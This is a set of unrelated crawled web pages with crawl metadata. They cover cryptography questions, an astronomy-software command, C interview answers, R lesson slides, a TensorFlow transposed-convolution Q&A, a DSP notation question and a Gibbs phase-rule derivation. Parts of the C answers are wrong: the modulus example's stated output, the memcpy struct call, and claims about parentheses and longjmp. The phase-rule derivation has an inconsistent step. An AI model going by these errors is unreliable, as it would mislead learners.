HMAC-SHA1 input size I know that the HMAC is a message authentication code that uses a cryptographic key in conjunction with a hash function (SHA1 , MD5, etc.). The HMAC output is 160 bits for HMAC-SHA160 and 256 bits for ... 194 views ### Does impersonating an SRP server give you enough information for an off-line dictionary attack? In a comment to an answer I wrote to another question, CodesInChaos wrote that: "Problem with SRP is that an attacker who impersonates a server learns the password hash, enabling offline search." ... 213 views ### Quadratic residuosity problem reduction to integer factorization How can one show how to reduce the quadratic residuosity problem to an integer factorization? 2k views ### Generating a secure random number in javascript What I am trying to do is generate a large (4096bit) random number in JavaScript that is cryptographically safe to use. My approach is the following: I am creating a ... 488 views 603 views ### What is “Blinding” used for in cryptography? What does "blinding" mean in cryptography, and where do we usually use it? Can you describe a sample implementation? 200 views ### Probability that an attacker wins the discrete logarithm game when exponents are drawn from a subset Suppose $g$ is a generator of an order $p$ cyclic group in which discrete logarithm is hard and $p$ is a prime (i.e., given $g^x$ for a random $x \in \{0,1,\ldots, p-1\}$, it is hard to recover $x$ ... 244 views I've been looking at the weakness with plain/textbook RSA, where the same message is encrypted and sent to multiple destinations. In this case, it is possible to recover the message. Given that an ... 290 views ### Two step encryption Is there any asymmetric cryptography algorithm which will allow recursive encryption. ... 2k views ### Constructing RSA private key, given public key As part of a puzzle I was given an RSA 256-bit public key and an encrypted message. The key itself is very weak, having exponent e = 65537 and modulus N = ... 1k views ### Cracking the Beaufort cipher Is there any easy way to crack a Beaufort cipher? We have a Vigenère table, and are trying to guess the keyword. Any easier way? 561 views ### Key derivation from a random seed The main problem is to use a block cipher to generate a random key. I would like to generate 256-bits key which can be as random as possible. I generate it in the following way: Pick a plaintext ... 151 views ### The meaning of “scheme” This question is a bit different from other questions here, but I think it is suitable to correctly understand the terminology of cryptography. Consider the following two sets of terms: Encryption ...
2015-02-27 06:17:16
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7213404178619385, "perplexity": 1598.934838494832}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-11/segments/1424936460576.24/warc/CC-MAIN-20150226074100-00095-ip-10-28-5-156.ec2.internal.warc.gz"}
https://starlink.eao.hawaii.edu/devdocs/sun95.htx/sun95ss119.html
### MULT Multiplies two NDF data structures #### Description: The routine multiplies two NDF  data structures pixel-by-pixel to produce a new NDF. mult in1 in2 out #### Parameters: First NDF to be multiplied. Second NDF to be multiplied. ##### OUT = NDF (Write) Output NDF to contain the product of the two input NDFs. The title for the output NDF. A null value will cause the title of the NDF supplied for Parameter IN1 to be used instead. [!] #### Examples: mult a b c This multiplies the NDF called a by the NDF called b, to make the NDF called c. NDF c inherits its title from a. mult out=c in1=a in2=b title="Normalised spectrum" This multiplies the NDF called a by the NDF called b, to make the NDF called c. NDF c has the title "Normalised spectrum". #### Notes: If the two input NDFs have different pixel-index bounds, then they will be trimmed to match before being multiplied. An error will result if they have no pixels in common.
2022-01-22 10:57:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4342624247074127, "perplexity": 14277.937085008074}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303845.33/warc/CC-MAIN-20220122103819-20220122133819-00281.warc.gz"}
https://www.examveda.com/c-fundamental-question-and-answer-for-interview/?page=2
# C Fundamental Question and Answer for Interview 8. What is the difference between goto and long jmp( ) and setjmp()? A goto statement implements a local jump of program execution, and the longjmp() and setjmp() functions implement a nonlocal, or far, jump of program execution. Generally, a jump in execution of any kind should be avoided because it is not considered good programming practice to use such statements as goto and longjmp in your program. A goto statement simply bypasses code in your program and jumps to a predefined position. To use the goto statement, you give it a labeled position to jump to. This predefined position must be within the same function. You cannot implement gotos between functions. Here is an example of a goto statement: { int x; printf("Excuse me while I count to 5000...n"); x = 1; while (1) { printf("%dn", x); if (x == 5000) goto all_done; else x = x + 1; } all_done: printf("Whew! That wasn't so bad, was it?n"); } This example could have been written much better, avoiding the use of a goto statement. Here is an example of an improved implementation: void better_function(void) { int x; printf("Excuse me while I count to 5000...n"); for (x=1; x<=5000; x++) printf("%dn", x); printf("Whew! That wasn't so bad, was it?n"); } As previously mentioned, the longjmp() and setjmp() functions implement a nonlocal goto. When your program calls setjmp(), the current state of your program is saved in a structure of type jmp_buf. Later, your program can call the longjmp() function to restore the program's state as it was when you called setjmp(). Unlike the goto statement, the longjmp() and setjmp() functions do not need to be implemented in the same function. However, there is a major drawback to using these functions: your program, when restored to its previously saved state, will lose its references to any dynamically allocated memory between the longjmp() and the setjmp(). This means you will waste memory for every malloc() or calloc() you have implemented between your longjmp() and setjmp(), and your program will be horribly inefficient. It is highly recommended that you avoid using functions such as longjmp() and setjmp() because they, like the goto statement, are quite often an indication of poor programming practice. Here is an example of the longjmp() and setjmp() functions: #include #include jmp_buf saved_state; void main(void); void call_longjmp(void); void main(void) { int ret_code; printf("The current state of the program is being saved...n"); ret_code = setjmp(saved_state); if (ret_code == 1) { printf("The longjmp function has been called.n"); printf("The program's previous state has been restored.n"); exit(0); } printf("I am about to call longjmp andn"); call_longjmp(); } void call_longjmp(void) { longjmp(saved_state, 1); } 9. What is an lvalue? An lvalue is an expression to which a value can be assigned. The lvalue expression is located on the left side of an assignment statement, whereas an rvalue is located on the right side of an assignment statement. Each assignment statement must have an lvalue and an rvalue. The lvalue expression must reference a storable variable in memory. It cannot be a constant. For instance, the following lines show a few examples of lvalues: int x; int* p_int; x = 1; *p_int = 5; The variable x is an integer, which is a storable location in memory. Therefore, the statement x = 1 qualifies x to be an lvalue. Notice the second assignment statement, *p_int = 5. By using the * modifier to reference the area of memory that p_int points to, *p_int is qualified as an lvalue. In contrast, here are a few examples of what would not be considered lvalues: #define CONST_VAL 10 int x; /* example 1 */ 1 = x; /* example 2 */ CONST_VAL = 5; In both statements, the left side of the statement evaluates to a constant value that cannot be changed because constants do not represent storable locations in memory. Therefore, these two assignment statements do not contain lvalues and will be flagged by your compiler as errors. 10. Can an array be an lvalue? Is an array an expression to which we can assign a value? The answer to this question is no, because an array is composed of several separate array elements that cannot be treated as a whole for assignment purposes. The following statement is therefore illegal: int x[5], y[5]; x = y; You could, however, use a for loop to iterate through each element of the array and assign values individually, such as in this example: int i; int x[5]; int y[5]; ... for (i=0; i<5; i++) x[i] = y[i] ... Additionally, you might want to copy the whole array all at once. You can do so using a library function such as the memcpy() function, which is shown here: memcpy ( x, y, sizeof ( y ) ) ; It should be noted here that unlike arrays, structures can be treated as lvalues. Thus, you can assign one structure variable to another structure variable of the same type, such as this: typedef struct t_name { char last_name[25]; char first_name[15]; char middle_init[2]; } NAME; ... NAME my_name, your_name; ... your_name = my_name; ... In the preceding example, the entire contents of the my_name structure were copied into the your_name structure. This is essentially the same as the following line: memcpy ( your_name, my_name, sizeof ( your_name ) ); 11. What is an rvalue? rvalue can be defined as an expression that can be assigned to an lvalue. The rvalue appears on the right side of an assignment statement. Unlike an lvalue, an rvalue can be a constant or an expression, as shown here: int x, y; x = 1; /* 1 is an rvalue; x is an lvalue */ y = (x + 1); /* (x + 1) is an rvalue; y is an lvalue */ An assignment statement must have both an lvalue and an rvalue. Therefore, the following statement would not compile because it is missing an rvalue: int x; x = void_function_call () /* the function void_function_call() returns nothing */ If the function had returned an integer, it would be considered an rvalue because it evaluates into something that the lvalue, x, can store. 12. Is left-to-right or right-to-left order guaranteed for operator precedence? The simple answer to this question is neither. The C language does not always evaluate left-to-right or right-to-left. Generally, function calls are evaluated first, followed by complex expressions and then simple expressions. Additionally, most of today's popular C compilers often rearrange the order in which the expression is evaluated in order to get better optimized code. You therefore should always implicitly define your operator precedence by using parentheses. For example, consider the following expression: a = b + c/d / function_call() * 5, The way this expression is to be evaluated is totally ambiguous, and you probably will not get the results you want. Instead, try writing it by using implicit operator precedence: a = b + (((c/d) / function_call()) * 5) Using this method, you can be assured that your expression will be evaluated properly and that the compiler will not rearrange operators for optimization purposes. 13. What is the difference between ++var and var++? The ++ operator is called the increment operator. When the operator is placed before the variable (++var), the variable is incremented by 1 before it is used in the expression. When the operator is placed after the variable (var++), the expression is evaluated, and then the variable is incremented by 1. The same holds true for the decrement operator (--). When the operator is placed before the variable, you are said to have a prefix operation. When the operator is placed after the variable, you are said to have a postfix operation. For instance, consider the following example of postfix incrementation: int x, y; x = 1; y = (x++ * 5); In this example, postfix incrementation is used, and x is not incremented until after the evaluation of the expression is done. Therefore, y evaluates to 1 times 5, or 5. After the evaluation, x is incremented to 2. Now look at an example using prefix incrementation: int x, y; x = 1; y = (++x * 5); This example is the same as the first one, except that this example uses prefix incrementation rather than postfix. Therefore, x is incremented before the expression is evaluated, making it 2. Hence, y evaluates to 2 times 5, or 10. 14. What does the modulus operator do? The modulus operator (%) gives the remainder of two divided numbers. For instance, consider the following portion of code: x = 15/7 If x were an integer, the resulting value of x would be 2. However, consider what would happen if you were to apply the modulus operator to the same equation: x = 15%7 The result of this expression would be the remainder of 15 divided by 7, or 1. This is to say that 15 divided by 7 is 2 with a remainder of 1. The modulus operator is commonly used to determine whether one number is evenly divisible into another. For instance, if you wanted to print every third letter of the alphabet, you would use the following code: int x; for (x=1; x<=26; x++) if ((x%3) == 0) printf("%c", x+64); The preceding example would output the string "cfilorux", which represents every third letter in the alphabet.
2022-09-26 11:48:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.39692384004592896, "perplexity": 1627.1457888579755}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334871.54/warc/CC-MAIN-20220926113251-20220926143251-00259.warc.gz"}
https://rna.wlu.edu/bio297/03-tidy-data-1-slides.html
Start the exercise To update your project with the data and .rmd file for this exercise, run: bio297::start() Mechanical Turk survey Download the file johnsonlab.xlsx from the data/ subfolder and take a quick look at it in Excel. I've already installed readxl for you, but if I hadn't you could install this package with: install.packages("readxl") To load the functions in readxl into our current session, we'll use library: library(readxl) Packages and help pages At the console you can use: ls("package:readxl") ## [1] "excel_sheets" "read_excel" The read_excel function seems simple enough! Let's use it to load data from the first sheet: jd <- read_excel("data/johnsonlab.xlsx") Why didn't we have to specify a sheet argument above? Getting the lay of the land View(jd) • The data is tidy: each variable has a column, each observation a row • Variable names are formatted consistently These data are also a nice mix of variable types. We have: • Continuous data: VacuumTime • Discrete data: VacuumUnderstanding • Categorical data: Gender class(jd$VacuumTime) ## [1] "numeric" class(jd$VacuumUnderstanding) ## [1] "numeric" Now let's check on a categorical variable: class(jd$Gender) ## [1] "numeric" The facts about Factors • Use character to hold arbitrary text: for example codon sequences • Use factor to hold true categorical variables (Gender) with defined levels (male, female). gender <- factor( c("male", "female") ) gender ## [1] male female ## Levels: female male levels(gender) ## [1] "female" "male" You can index factors just like any other type of vector: gender[ c(1, 1, 2, 2, 1) ] ## [1] male male female female male ## Levels: female male Using factors to model categorical data We can replace the current numeric column with a factor: jd$Gender <- gender[ jd$Gender ] Check to make sure that worked and verify that you understand why it did! # Enter your code here! Summary statistics You can call summary on an entire data frame: summary(jd) Or just one vector: summary(jd$VacuumTime) ## Min. 1st Qu. Median Mean 3rd Qu. Max. ## 1.519 3.286 4.384 6.092 6.696 95.030 summary(jd$Gender) ## female male ## 118 58 Basic plotting Just like summary, the plotting functions like plot and boxplot are also a little bit magical in R. We can plot one numeric column: plot(jd$VacuumTime) Or make a scatter plot with two: plot(jd$VacuumTime, jd$VelcroTime) Formula syntax So that last scatter plot in formula syntax would be: plot(VelcroTime ~ VacuumTime, data = jd) boxplot(Age ~ Gender, data = jd) Use plot and boxplot to explore several other interactions in this data set! # Enter your code here! 2. When you're ready, use bio297::submit("03-tidy-data-1.rmd") to submit the assignment.
2019-05-20 04:19:21
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.42943793535232544, "perplexity": 7820.481255814972}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232255562.23/warc/CC-MAIN-20190520041753-20190520063753-00408.warc.gz"}
https://datascience.stackexchange.com/questions/26451/how-to-calculate-the-output-shape-of-conv2d-transpose
# How to calculate the output shape of conv2d_transpose? Currently I code a GAN to generate MNIST numbers but the generator doesnt want to work. First I choose z with shape 100 per Batch, put into a layer to get into the shape (7,7, 256). Then conv2d_transpose layer to into 28, 28, 1. (which is basically a mnist pic) I have two questions 1.) This code doesn't work for obvious. Do you have any clue, why? 2.) I am very aware how transpose convolution works but I can't find any resource to calculate the output size given input, strides and kernel size specific to Tensorflow. The useful information I found is https://arxiv.org/pdf/1603.07285v1.pdf but e.g. padding in Tensorflow works very different. Can you help me? mb_size = 32 #Size of image batch to apply at each iteration. X_dim = 784 z_dim = 100 h_dim = 7*7*256 dropoutRate = 0.7 alplr = 0.2 #leaky Relu def generator(z, G_W1, G_b1, keepProb, first_shape): G_W1 = tf.Variable(xavier_init([z_dim, h_dim])) G_b1 = tf.Variable(tf.zeros(shape=[h_dim])) G_h1 = lrelu(tf.matmul(z, G_W1) + G_b1, alplr) G_h1Drop = tf.nn.dropout(G_h1, keepProb) # drop out X = tf.reshape(G_h1Drop, shape=first_shape) out = create_new_trans_conv_layer(X, 256, INPUT_CHANNEL, [3, 3], [2,2], "transconv1", [-1, 28, 28, 1]) return out # new transposed cnn def create_new_trans_conv_layer(input_data, num_input_channels, num_output_channels, filter_shape, stripe, name, output_shape): # setup the filter input shape for tf.nn.conv_2d conv_filt_shape = [filter_shape[0], filter_shape[1], num_output_channels, num_input_channels] # initialise weights and bias for the filter weights = tf.Variable(tf.truncated_normal(conv_filt_shape, stddev=0.03), name=name + '_W') bias = tf.Variable(tf.truncated_normal([num_input_channels]), name=name + '_b') # setup the convolutional layer operation conv1 = tf.nn.conv2d_transpose(input_data, weights, output_shape, [1, stripe[0], stripe[1], 1], padding='SAME') conv1 += bias # apply a ReLU non-linear activation conv1 = lrelu(conv1, alplr) return conv1 ... _, G_loss_curr = sess.run( [G_solver, G_loss], feed_dict={z: sample_z(mb_size, z_dim), keepProb: 1.0} #training generator Here is the correct formula for computing the size of the output with tf.layers.conv2d_transpose(): # Padding==Same: H = H1 * stride H = (H1-1) * stride + HF where, H = output size, H1 = input size, HF = height of filter e.g., if H1 = 7, Stride = 3, and Kernel size = 4, With padding=="same", output size = 21, with padding=="valid", output size = 22 To test this out (verified in tf 1.4.0): import tensorflow as tf import numpy as np x = tf.placeholder(dtype=tf.float32, shape=(None, 7, 7, 32)) dcout = tf.layers.conv2d_transpose(x, 64, 4, 3, padding="valid") with tf.Session() as sess: sess.run(tf.global_variables_initializer()) xin = np.random.rand(1,7,7,32) out = sess.run(dcout, feed_dict={x:xin}) print(out.shape) Take a look at the source code for tf.keras.Conv2DTranspose, which calls the function deconv_output_length when calculating its output size. There's a subtle difference between the accepted answer and what you find here: def deconv_output_length(input_length, filter_size, padding, """Determines output length of a transposed convolution given input length. Arguments: input_length: Integer. filter_size: Integer. padding: one of "same", "valid", "full". Can be set to None in which case the output length is inferred. stride: Integer. dilation: Integer. Returns: The output length (integer). """ assert padding in {'same', 'valid', 'full'} if input_length is None: return None # Get the dilated kernel size filter_size = filter_size + (filter_size - 1) * (dilation - 1) # Infer length if output padding is None, else compute the exact length # note the call to max below! length = input_length * stride + max(filter_size - stride, 0) length = input_length * stride - (stride + filter_size - 2) length = input_length * stride else: length = ((input_length - 1) * stride + filter_size - 2 * pad + return length I added the comment above the call to max. The formula for padding == 'valid' is H = H1 * stride + max(HF - stride, 0), which only varies from @Manish P's answer when stride < HF. This one got me into trouble, so I thought I'd post it here. Instead of using tf.nn.conv2d_transpose you can use tf.layers.conv2d_transpose It is a wrapper layer and there is no need to input output shape or if you want to calculate output shape you can use the formula: H = (H1 - 1)*stride + HF - 2*padding H - height of output image i.e H = 28 H1 - height of input image i.e H1 = 7 HF - height of filter The answers here give figures that work, but they don't mention that there are multiple possible output shapes for the convolution-transpose operation. Indeed, if the output shape was completely determined by the other parameters then there would be no need for it to be specified. The output size of a convolution operation is # padding=="SAME" conv_out = ceil(conv_in/stride) conv_out = ceil((conv_in-k+1)/stride) where conv_in is the input size and k is the kernel size. In OP's link these padding methods are called 'half padding' and 'no padding' respectively. When calling tf.nn.conv2d_transpose(value, filter, output_shape, strides) we need the output_shape parameter to be the shape of a tensor that, if convolved with filter and strides, would have produced a tensor of the same shape as value. Because of rounding, there are multiple such shapes when stride>1. Specifically, we need dconv_in-1 <= (dconv_out-k)/s <= dconv_in ==> (dconv_in-1)s + k <= dconv_out <= (dconv_in)s + k If dconv_in = 7, k = 4, stride = 3 # with SAME padding dconv_out = 19 or 20 or 21 dconv_out = 22 or 23 or 24 The tf.layers API automatically calculates an output_shape (which seems to be the smallest possible for VALID padding and the largest possible for SAME padding). This is often convenient, but can also lead to shape mismatches if you are trying to recover the shape of a previously convolved tensor, eg in an autoencoder. For example import tensorflow as tf import numpy as np k=22 cin = tf.placeholder(tf.float32, shape=(None, k+1,k+1,64)) w1 = tf.placeholder(tf.float32, shape=[4,4,64,32]) cout = tf.nn.conv2d(cin, w1, strides=(1,3,3,1), padding="VALID") f_dict={cin:np.random.rand(1,k+1,k+1,64), w1:np.random.rand(4,4,64,32)} dcout1 = tf.nn.conv2d_transpose(cout, w1, strides=(1,3,3,1), dcout2 = tf.nn.conv2d_transpose(cout, w1, strides=(1,3,3,1), dcout_layers = tf.layers.conv2d_transpose(cout, 64, 4, 3, padding="VALID") with tf.Session() as sess: sess.run(tf.global_variables_initializer()) inp_shape = sess.run(cin, feed_dict=f_dict).shape conv_shape = sess.run(cout, feed_dict=f_dict).shape lyrs_shape = sess.run(rcout, feed_dict=f_dict).shape nn_shape1 = sess.run(dcout1, feed_dict=f_dict).shape nn_shape2 = sess.run(dcout2, feed_dict=f_dict).shape print("original input shape:", inp_shape) print("shape after convolution:", conv_shape) print("recovered output shape using tf.layers:", lyrs_shape) print("one possible recovered output shape using tf.nn:", nn_shape1) print("another possible recovered output shape using tf.nn:", nn_shape2) >>> original input shape: (1, 23, 23, 64) >>> shape after convolution: (1, 8, 8, 32) >>> recovered output shape using tf.layers: (1, 22, 22, 64) >>> one possible recovered output shape using tf.nn: (1, 22, 22, 64) >>> another possible recovered output shape using tf.nn: (1, 23, 23, 64)
2021-05-11 04:14:37
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3186705708503723, "perplexity": 10215.155487468237}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243991641.5/warc/CC-MAIN-20210511025739-20210511055739-00238.warc.gz"}
https://dsp.stackexchange.com/questions/68484/confusion-regarding-notation-symbol/68486
# Confusion regarding notation/symbol? I was reading circular convolution topic from Digital Signal Processing Using Matlab 3rd Ed,by Proakis. I came across a strange term/symbol; I have highlighted it in attached snapshot I have also attached snap of eq 5.24,in 2nd snap, where this RN(n) symbol appears also: • Can you give a little more context on the topic being explained here? By looking at just this I can only imagine that this term represents $n^{th}$ component of a Vector in N dimension, usually represented as $\mathcal{R}^N$ – DSP Rookie Jun 20 at 11:44 • Proakis / edited multiple books, in multiple revisions. Which one is this, which page? – Marcus Müller Jun 20 at 11:53 This symbol denotes a rectangular pulse of length $$N$$: $$\mathcal{R}_N(n)=\begin{cases}1,&0\le n\le N-1\\0,&\textrm{otherwise}\end{cases}$$ I'm not sure where it is defined for the first time, but this definition is clear from the equation above Eq. $$(5.24)$$ on page $$130$$ of the 3rd edition of Digital Signal Processing Using Matlab by V.K. Ingle and J.G. Proakis. • @engr: I don't see how it's different. If you interpret $\mathcal{R}_N(n)$ as in my answer, it matches exactly the equation given in the book. – Matt L. Jun 20 at 14:49
2020-11-29 17:30:03
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 4, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8198032379150391, "perplexity": 1002.1486464825256}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141201836.36/warc/CC-MAIN-20201129153900-20201129183900-00674.warc.gz"}
https://byjus.com/physics/derivation-of-phase-rule/
# Derivation of Phase Rule The phase rule describes the possible number of degrees of freedom in an enclosed system at equilibrium, in terms of the number of separate phases and the number of chemical constituents in the system. It was deduced by J.W Gibbs in the 1870s. Today, the phase rule is popularly known as the Gibbs phase rule all over the world. Here, in the article, we will be discussing the derivation of phase rule. ## Gibbs Phase Rule Gibbs phase rule states that if the equilibrium in a heterogeneous system is not affected by gravity or by electrical and magnetic forces, the number of degree of freedom is given by the equation F=C-P+2 where C is the number of chemical components P is the number of phases Basically, it describes the mathematical relationship for determining the stability of phases present in the material at equilibrium condition. In the next section, let us look at the phase rule derivation. ### Phase Rule Derivation The Gibb’s phase rule on the basis of the thermodynamic rule can be derived as follows: First, let us consider a heterogeneous system consisting of Pn number of phases and Cn number of components in equilibrium. Let us assume that the passage of a component from one phase to another doesn’t involve any chemical reaction. When the system is in equilibrium, it can be described by the following parameters: • Temperature • Pressure • The composition of each phase a. The total number of variables required to specify the state of the system is: • Pressure: same for all phases • Temperature: same for all phases • Concentration The independent concentration variables for one phase with respect to the C components is C – 1. Therefore, the independent concentration variables for P phases with respect to C components is P (C – 1). Total number of variables = P (C – 1) + 2 (1) b. The total number of equilibria: The various phases present in the system can only remain in equilibrium when the chemical potential (µ) of each of the component is the same in all phases, i.e. µ1, P1 = µ1, P2 = µ1, P3 = … = µ1, P µ2, P1 = µ2, P2 = µ2, P3 = … = µ2, P : : : : : : : : : : : : µC, P1 = µC, P2 = µC, P3 = … = µC, P The number of equilibria for each P phases for each component is P – 1. For C components, the number of equilibria for P phases is P ( C – 1). Hence, the total number of equilibria involved is E = C (P – 1). (2) Equating eq (1) and (2), we get $F=[P(C-1)+2-C]-[C(P-1)]$ $F=[CP-P+2-CP+C]$ $F=C-P+2$ The obtained formula is the Gibbs phase rule. Stay tuned to BYJU’S to learn more physics derivations.
2020-02-23 05:44:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6401505470275879, "perplexity": 577.3712059829323}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875145746.24/warc/CC-MAIN-20200223032129-20200223062129-00190.warc.gz"}
https://earthscience.stackexchange.com/questions/10635/where-can-i-find-information-about-the-basic-concepts-of-sedimentary-basins/10638
# Where can I find information about the basic concepts of sedimentary basins? There are a lot of papers on the web but they don't explain the concepts, they just mention them, taking for granted that the reader knows the concepts. I mean piggyback basin, forearc, back arc, intracratonic, intramontane, etc.
2020-12-03 17:33:45
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8508807420730591, "perplexity": 778.7537419604133}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141729522.82/warc/CC-MAIN-20201203155433-20201203185433-00481.warc.gz"}
https://gmatclub.com/forum/a-square-is-drawn-by-joining-the-midpoints-of-the-sides-of-a-102880.html
